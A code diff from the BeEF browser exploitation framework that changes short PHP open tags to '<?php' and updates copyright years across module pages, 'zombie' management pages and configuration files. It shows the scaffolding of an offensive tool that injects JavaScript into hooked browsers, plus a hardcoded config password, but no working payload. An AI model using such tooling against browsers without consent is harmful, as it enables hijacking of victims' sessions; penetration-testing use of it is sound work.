modules/standard/prompt_dialog/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_prompt = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "PROMPTSTRING", document.myform.prompt_str.value);

modules/standard/raw_javascript/index.php

@@ -1,5 +1,5 @@
 <?php
-	// Copyright (c) 2006-2009, Wade Alcorn 
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 	// beef.20.alfa@spamgourmet.com
@@ -11,7 +11,7 @@
 
 	function get_b64_code_rj() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "REGEXP", document.cmd_form.regexp.value);

modules/standard/rewrite_status_bar/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_status = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "STATUSBARSTRING", document.myform.status_str.value);

pw.php

@@ -1,3 +1,9 @@
-<?
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
+	// All Rights Reserved
+	// wade@bindshell.net - http://www.bindshell.net
+?>
+
+<?php
 $passwd = 'BeEFConfigPass';
 ?>

submit_config.php

@@ -1,4 +1,10 @@
-<?
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
+	// All Rights Reserved
+	// wade@bindshell.net - http://www.bindshell.net
+?>
+
+<?php
 	include ('pw.php');
     require_once("include/filter.inc.php");
 
@@ -56,7 +62,7 @@
 			<h2>BeEF Successfuly Configured</h2>
 
 			<form name="configform">
-				<input class="button" type="button" value="Finished" onClick="javascript:location.href='<? echo $config ?>ui'"/>
+				<input class="button" type="button" value="Finished" onClick="javascript:location.href='<?php echo $config ?>ui'"/>
 			</form>
 <?php
 		} else {
@@ -66,12 +72,12 @@
 				following command will correct the problem: <br>
 				# chown <?php $apacheuser = posix_getpwuid(posix_geteuid()); printf($apacheuser['name'] . " " . getcwd() . '/include' ) ?><br>
 				# chown -R <?php printf($apacheuser['name'] . " " . getcwd() . '/cache' ) ?><br>
-<?
+<?php
 			}
 	} else { // the password was incorrect
 ?>
 		<h2>Password</h2>
 		Incorrect BeEF password, please try again.
-<?
+<?php
 	}
 ?>

ui/about.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>
@@ -26,7 +26,7 @@
 	* Set Autorun support added to each module<br>
 	<br>
 
-	Copyright &copy 2006-2009.
+	Copyright &copy 2006-2010.
     <a href=mailto:wade@bindshell.net>Wade Alcorn</a>.
     All Rights Reserved.
 </div>

ui/exampleusage.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>

ui/get_module_details.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -32,4 +32,4 @@
 			}
 			break;
 	}
-?>
+?>

ui/get_zombie_details.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

ui/help.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>

ui/index.php

@@ -1,5 +1,5 @@
 <?php
-	// Copyright (c) 2006-2009, Wade Alcorn 
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -67,10 +67,10 @@
 ?>
 
 	<script>
- 		var zl  = new ZombieList(<?= HEARTBEAT_FREQUENCY ?>);
+ 		var zl  = new ZombieList(<?php echo HEARTBEAT_FREQUENCY ?>);
  		var ar  = new Autorun();
- 		var mod = new Module(<?= HEARTBEAT_FREQUENCY ?>);
- 		var log = new Log(<?= SUMMARY_LOG_HEARTBEAT_FREQUENCY ?>);
+ 		var mod = new Module(<?php echo HEARTBEAT_FREQUENCY ?>);
+ 		var log = new Log(<?php echo SUMMARY_LOG_HEARTBEAT_FREQUENCY ?>);
 
 		var beefPeriodicalExecuter = true;
  		var peZ = new PeriodicalExecuter(function(pe) { if (beefPeriodicalExecuter) { zl.heartbeat();  } else { if (pe) { pe.stop();} } }, zl.frequency);

ui/log.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -21,7 +21,7 @@
 
 <div class="log">
 <div id="logdata">
-<?
+<?php
 	echo get_log();
 ?>
 </div>

ui/logcontrol.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

ui/options.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>

ui/send_cmds.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

ui/thanks.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>

ui/update.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>